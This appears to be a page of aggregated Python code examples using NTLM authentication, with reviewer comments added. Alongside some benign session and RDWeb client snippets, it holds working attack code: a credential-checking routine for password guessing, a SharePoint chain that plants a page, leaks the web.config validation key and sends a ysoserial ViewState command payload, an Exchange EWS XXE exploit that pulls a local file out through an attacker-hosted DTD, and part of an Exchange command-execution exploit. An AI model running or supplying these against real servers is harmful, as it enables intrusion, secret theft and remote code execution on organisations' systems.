Exemplo n.º 1
def check_creds(opts):
    """Try one credential pair against ``url`` and report whether it was accepted.

    Args:
        opts: 6-tuple ``(url, domain, username, password, authtype, proxies)``.
            ``authtype == "ntlm"`` selects ``HttpNtlmAuth``; any other value
            falls back to requests' basic-auth ``(user, password)`` tuple.

    Returns:
        ``(username, password)`` when the response status is anything other
        than 401; ``None`` on a 401 or when the request raised.
    """

    url, domain, username, password, authtype, proxies = opts

    # Prefix the user with the domain (DOMAIN\user) only when one was given;
    # the same shape is used for both the NTLM and the basic-auth branch.
    if authtype == "ntlm":
        if domain:
            auth = HttpNtlmAuth(f"{domain}\\{username}", password)
        else:
            auth = HttpNtlmAuth(username, password)

    else:
        if domain:
            auth = (f"{domain}\\{username}", password)
        else:
            auth = (username, password)

    try:
        # verify=False disables TLS certificate checking, so the credentials
        # sent here can be read by anyone able to interpose on the connection.
        # allow_redirects=False keeps the first hop's status code, which is
        # what the 401 test below relies on.
        res = requests.get(url,
                           verify=False,
                           proxies=proxies,
                           auth=auth,
                           allow_redirects=False)

        # NOTE(review): every non-401 status (403, 404, 3xx, 5xx) counts as a
        # success, so endpoints that reject or reroute without issuing a
        # challenge produce false positives.
        if res.status_code != 401:

            # Echoes the plaintext password to stdout.
            print(f"Success! {username}:{password}")

            return username, password

    except Exception as e:
        # Broad catch: connection, proxy and protocol errors are all reported
        # the same way (and the password is printed again).
        print(f"Error occurred with {username}:{password}: {e}")
Exemplo n.º 2
def trigger_rce(target, domain, path, user, password, cmd, key):
    """Generate a signed ViewState blob with ``ysoserial.exe`` and POST it to ``target``.

    Args:
        target: host of the SharePoint site; contacted over plain HTTP.
        domain, user, password: NTLM credentials for the request.
        path: application path passed through as ``--apppath`` / ``--path``.
        cmd: command string embedded in the ``TypeConfuseDelegate`` gadget.
        key: HMACSHA256 validation key used to sign the ViewState (the
            64-character value ``get_vkey`` on this page returns).

    Returns:
        None. The HTTP response is discarded, so nothing here confirms that
        the server accepted the payload.
    """
    # List form (no shell=True): cmd travels as a single argv entry and is not
    # re-parsed by a shell on this side. The binary path is relative to the
    # current working directory.
    out = subprocess.Popen([
        'yss/ysoserial.exe', 
        '-p', 'ViewState',
        '-g', 'TypeConfuseDelegate',
        '-c', '%s' % cmd,
        '--apppath=%s' % path,
        '--path=%s_layouts/15/zoombldr.aspx' % path,
        '--islegacy',
        '--validationalg=HMACSHA256',
        '--validationkey=%s' % key
    ], stdout=subprocess.PIPE)
    # communicate() waits for the process and collects stdout; the exit code is
    # not checked, so a failed ysoserial run posts an empty __VIEWSTATE.
    rce = { "__VIEWSTATE" : out.communicate()[0].decode() }
    # Only a server that still honours ViewState signed with this key is
    # affected; presumably a rotated machineKey or the vendor fix makes the
    # request fail signature validation (server-side this shows up as a
    # ViewState MAC failure on the zoombldr.aspx endpoint).
    requests.post("http://%s/_layouts/15/zoombldr.aspx" % target, data=rce, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password))
Exemplo n.º 3
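    def init_requests(self, domain, username, password):
        """Create the shared ``requests`` session and attach NTLM auth to it.

        Args:
            domain: Windows domain; when non-empty the user is sent as
                ``DOMAIN\\user``.
            username, password: NTLM credentials. Auth is attached only when
                both are non-empty; otherwise the session stays anonymous.

        Side effects:
            Sets ``self.logger`` and ``self.session``.
        """
        self.logger = Logger().get_logger()
        # create the sessions object for the requests
        self.session = requests.Session()
        # NOTE(review): this turns off TLS certificate verification for every
        # request made through the session, so the NTLM exchange can be
        # intercepted; a CA bundle path would be the safer value here.
        self.session.verify = False

        # update the ua flag
        self.session.headers.update({'User-Agent': constants.USER_AGENT})

        # check if we have to add the auth to our requests
        if username and password:
            if domain:
                # NTLM expects DOMAIN\user. The published listing had a masked
                # '******' format string here, which raises TypeError when
                # %-formatted with two arguments.
                username = '%s\\%s' % (domain, username)
            self.session.auth = HttpNtlmAuth(username, password)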
Exemplo n.º 4
def put_page(target, domain, user, password):
    """PUT ``/poc.aspx`` onto ``target``: a page that echoes one request header unescaped.

    The DataFormWebPart binds the ``HTTP_360Vulcan`` server variable (i.e. a
    ``360Vulcan`` request header) to an XSL parameter and writes it out with
    ``disable-output-escaping="yes"``, so whatever later requests put in that
    header is rendered as raw page markup (``get_vkey`` on this page relies on
    that to pull in ``/web.config``).

    Args:
        target: host of the SharePoint site; contacted over plain HTTP.
        domain, user, password: NTLM credentials; the user needs rights to
            create pages on the site.

    Raises:
        AssertionError: when the PUT is not answered with 200 or 201. ``assert``
            is stripped under ``python -O``, so the check disappears there.
    """
    payload = """<WebPartPages:DataFormWebPart runat="server">
<ParameterBindings>
  <ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
</ParameterBindings>
  <xsl>
    <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
      <xsl:param name="ssi" />
      <xsl:template match="/">
        <xsl:value-of select="$ssi" disable-output-escaping="yes" />
      </xsl:template>
    </xsl:stylesheet>
  </xsl>
</WebPartPages:DataFormWebPart>"""
    # A new page landing via PUT at the site root is the server-side artefact
    # a defender can look for; the response body is not inspected here.
    r = requests.put("http://%s/poc.aspx" % target, data=payload, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password))
    assert (r.status_code == 200 or r.status_code == 201), "(-) page creation failed, user doesn't have site ownership rights!"
Exemplo n.º 5
def main():
    """Entry point: fetch the RDWeb feed and emit an RDP file plus a desktop
    entry for every terminal server it lists."""
    args = create_arguments()
    auth = get_auth_info(args)

    session = requests.Session()
    session.auth = HttpNtlmAuth(auth["user"], auth["password"])

    # The body of the first (NTLM-authenticated) response is reused verbatim
    # as the .ASPXauth cookie for the feed request and every download.
    # NOTE(review): presumably the endpoint answers with the forms-auth ticket
    # as its body — confirm against the server before relying on it.
    ticket = session.get(args.url).text
    cookie = {".ASPXauth": ticket}

    feed = session.get(args.url, cookies=cookie)
    # Anything that is not XML (an error page, a login redirect body) surfaces
    # here as a ParseError.
    root = ElementTree.fromstring(feed.text)

    os.makedirs(RDP_FILES_PATH, exist_ok=True)

    # {*} matches an element in any namespace, so the feed's namespace does
    # not have to be spelled out.
    resources = root.findall("./{*}Publisher/{*}Resources/{*}Resource")
    for item in resources:
        resource = parse_resource(item)
        for terminal_server in resource["terminal_servers"]:
            rdp_file = download_rdp(cookie, terminal_server)
            generate_desktop(resource, rdp_file)
Exemplo n.º 6
 def __init__(self, args):
     """Copy the parsed CLI options onto the instance and build the session.

     Args:
         args: argparse-style namespace with ``url``, ``username``,
             ``password``, ``target``, ``header``, ``request``, ``data`` and
             ``content_type`` attributes.
     """
     parsed = urlparse(args.url)

     # Request description straight from the command line; ``service`` is
     # just the path component of the URL.
     self.url = args.url
     self.service = parsed.path
     self.username = args.username
     self.password = args.password
     self.target = args.target
     self.headers = args.header
     self.method = args.request
     self.data = args.data
     self.content_type = args.content_type

     session = requests.Session()
     session.auth = HttpNtlmAuth(self.username, self.password)
     # Assigning (rather than updating) replaces requests' default headers
     # wholesale, so only User-Agent is sent by default.
     session.headers = {
         'User-Agent':
         'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
     }
     # NOTE(review): plain-HTTP traffic is pinned to a local proxy on
     # 127.0.0.1:8080 — with nothing listening there requests fail, and
     # https URLs bypass it entirely since no 'https' key is set.
     session.proxies = {'http': 'http://127.0.0.1:8080'}
     self.s = session
Exemplo n.º 7
 def __init__(self, site_root_url: str, username: str, password: str):
     """Remember the site root and prepare NTLM auth for later requests.

     TODO: validate ``site_root_url`` (e.g. a regex check in a setter); it is
     currently stored exactly as given.
     """
     super().__init__()
     self.site_url = site_root_url
     ntlm = HttpNtlmAuth(username=username, password=password)
     self.auth = ntlm
Exemplo n.º 8
def main(t, usr, pwd):
    """Serve a DTD locally and send an EWS SOAP request whose base64 body carries an external-entity payload.

    Args:
        t: Exchange host; EWS is reached at ``https://t/ews/Exchange.asmx``
            with TLS verification turned off.
        usr: ``user@domain``; split on ``@`` into the NTLM user and domain.
        pwd: password for NTLM.

    Relies on module-level ``port``, ``host`` and ``file`` plus the ``xxe``
    request-handler class, none of which are defined here (presumably set
    from the CLI — confirm). ``file`` shadows a builtin on Python 2.
    """
    # Daemon thread so the POST below is not blocked; the server exists to
    # answer the target's fetch of /poc.dtd and is never shut down explicitly.
    server = HTTPServer(('0.0.0.0', int(port)), xxe)
    handlerthr = Thread(target=server.serve_forever, args=())
    handlerthr.daemon = True
    handlerthr.start()
    username = usr.split("@")[0]
    domain = usr.split("@")[1]
    h = {"Content-type" : "text/xml; charset=utf-8"}
    # '%%' is a literal percent sign once the string is %-formatted. The
    # parameter entity 'dtd' points at host:port, so the observable on the
    # server side is an outbound HTTP request from the Exchange host to that
    # address; an XML parser with external entities disabled never makes it.
    xxe_payload = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY %% start "<![CDATA[">
 <!ENTITY %% stuff SYSTEM "file:///%s">
<!ENTITY %% end "]]>">
<!ENTITY %% dtd SYSTEM "http://%s:%d/poc.dtd">
%%dtd;
]>""" % (file, host, int(port))
    # The DOCTYPE payload is base64-encoded into the RouteComplaint Data element.
    d = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
  <soap:Header>
    <t:RequestServerVersion Version="Exchange2010_SP2"></t:RequestServerVersion>
  </soap:Header>
  <soap:Body>
    <m:RouteComplaint MessageDisposition="SaveOnly">
      <m:Data>%s</m:Data>
    </m:RouteComplaint>
  </soap:Body>
</soap:Envelope>""" % b64encode(xxe_payload.encode()).decode("utf-8") 
    # verify=False disables certificate validation; the response is discarded.
    requests.post("https://%s/ews/Exchange.asmx" % t, data=d, headers=h, verify=False, auth=HttpNtlmAuth('%s\\%s' % (domain,username), pwd))
Exemplo n.º 9
            </t:NumberedRecurrence>
          </t:Recurrence>
        </t:CalendarItem>
      </m:Items>
    </m:CreateItem>
  </soap:Body>
</soap:Envelope>
""" % payload2

# Python 2 script (bare `print` statements below). Under Python 3 `res.content`
# is bytes, so the str `split` calls would raise TypeError; `res.text` is the
# py3 equivalent. `payload1`, `target`, `username`, `pwd` and `cmd` are
# module-level names set earlier in the file (not visible here).
# verify=False disables TLS certificate validation for the EWS request.
# '%s' % (username) is not a tuple, so the user is sent without a domain prefix.
res = requests.post("https://%s/ews/Exchange.asmx" % target,
                    data=payload1,
                    headers={
                        "Content-type": "text/xml; charset=utf-8",
                    },
                    verify=False,
                    auth=HttpNtlmAuth('%s' % (username), pwd))

# Any non-200 answer aborts; the body is not shown, so auth and SOAP faults
# are indistinguishable from here.
if res.status_code != 200:
    print("error 1")
    exit()
ct = res.content
# The CreateItem response is scraped with string splits rather than parsed as
# XML: a missing ItemId or ChangeKey attribute raises IndexError.
item_id = ct.split('<t:ItemId Id="')[1].split('"')[0]
change_key = ct.split('ChangeKey="')[1].split('"')[0]
print "Attacking target %s with user %s" % (target, username)

print "Sending command cmd.exe /c %s" % cmd
# Fresh unauthenticated session for the OWA steps that follow; the mkt cookie
# pins the locale.
session = requests.Session()
header = {"Cookie": "mkt=en-US"}

data = {
    "destination": "https://%s/owa" % target,
Exemplo n.º 10
def get_vkey(target, domain, user, password):
    """Read the machineKey ``validationKey`` back through the page ``put_page`` created.

    The ``360Vulcan`` header carries a server-side include directive for
    ``/web.config``; because ``poc.aspx`` emits that header unescaped, the
    response body contains the config file and the key is pulled out with a
    regex.

    Args:
        target: host of the SharePoint site; contacted over plain HTTP.
        domain, user, password: NTLM credentials.

    Returns:
        The 64-character ``validationKey`` value.

    Raises:
        AssertionError: when no key is found (include blocked, page missing,
            or a differently formatted machineKey). ``assert`` is stripped
            under ``python -O``.
    """
    h = { "360Vulcan": "<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->" }
    r = requests.get("http://%s/poc.aspx" % target, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password), headers=h)
    # NOTE(review): .{64} assumes a 64-character (256-bit hex) key: a longer
    # key is truncated and a shorter one pulls in the closing quote and what
    # follows it.
    match = re.search("machineKey validationKey=\"(.{64})", r.text)
    assert match, "(-) unable to leak the validation key, exploit failed!"
    return match.group(1)